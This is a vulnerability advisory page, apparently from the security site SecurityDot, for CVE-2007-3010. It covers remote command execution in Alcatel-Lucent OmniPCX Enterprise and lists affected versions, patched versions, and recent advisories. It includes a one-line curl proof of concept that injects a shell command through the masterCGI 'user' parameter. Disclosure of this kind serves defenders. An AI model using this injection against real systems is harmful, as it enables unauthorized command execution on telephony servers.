exploits , vulnerabilities , articles , Alcatel-Lucent OmniPCX Enterprise Remote Command Execution Vulnerability

Title	Alcatel-Lucent OmniPCX Enterprise Remote Command Execution Vulnerability
Published	2007-09-17-12:00AM
Updated	2007-09-17-11:10PM
Class	Input Validation Error
CVE	CVE-2007-3010
Remote	Yes
Local	No
Credit	RedTeam Pentesting GmbH is credited with the discovery of this issue.
Vulnerable	AlcatelLucent OmniPCX Enterprise 7.1 AlcatelLucent OmniPCX Enterprise 7.0 AlcatelLucent OmniPCX Enterprise 6.2 AlcatelLucent OmniPCX Enterprise 6.1 AlcatelLucent OmniPCX Enterprise 6.0 AlcatelLucent OmniPCX Enterprise 0 Alcatel OmniPCX Enterpise 7
Not Vulnerable	Alcatel-Lucent OmniPCX Enterprise 7.1 patch F5.401.19 Alcatel-Lucent OmniPCX Enterprise 6.2 patch F3.301.37 Alcatel-Lucent OmniPCX Enterprise 6.1 patch F2.502.32
Code	An attacker can exploit this issue via a browser.The following command demonstrates this issue:curl -k "https://www.example.com/cgi-bin/masterCGI?ping=nomip&user=;ls\${IFS}-l;"
TXT

Vulnerabilities - newest 10 RSS | More

• 2008-09-07 Samsung DVR SHR-2040 HTTPD Denial of Service Vulnerability
• 2008-09-06 Computer Associates Products Message Engine RPC Server Multiple Buffer Overflow Vulnerabilities
• 2008-09-05 NetBSD ICMPv6 MLD Packet Remote Denial of Service Vulnerability
• 2008-09-05 Drupal Content Creation Kit Module Multiple HTML Injection Vulnerabilities
• 2008-09-05 HP OpenView Select Identity Connectors Local Information Disclosure Vulnerability
• 2008-09-05 eZoneScripts Dating Website Remote File Upload Vulnerability
• 2008-09-05 MicroTik RouterOS SNMP Security Bypass Vulnerability
• 2008-09-04 Dnsmasq DCHP Lease Multiple Remote Denial Of Service Vulnerabilities
• 2008-09-04 Zen Cart Multiple SQL Injection Vulnerabilities
• 2008-09-04 NETGEAR WN802T Wireless Access Point EAPoL Key Length Denial of Service Vulnerability

• Vulnerabilities
• Exploits
• News
• Articles

Copyright 2007, SecurityDot
Mon, 08 Sep 2008 10:49:21 +0000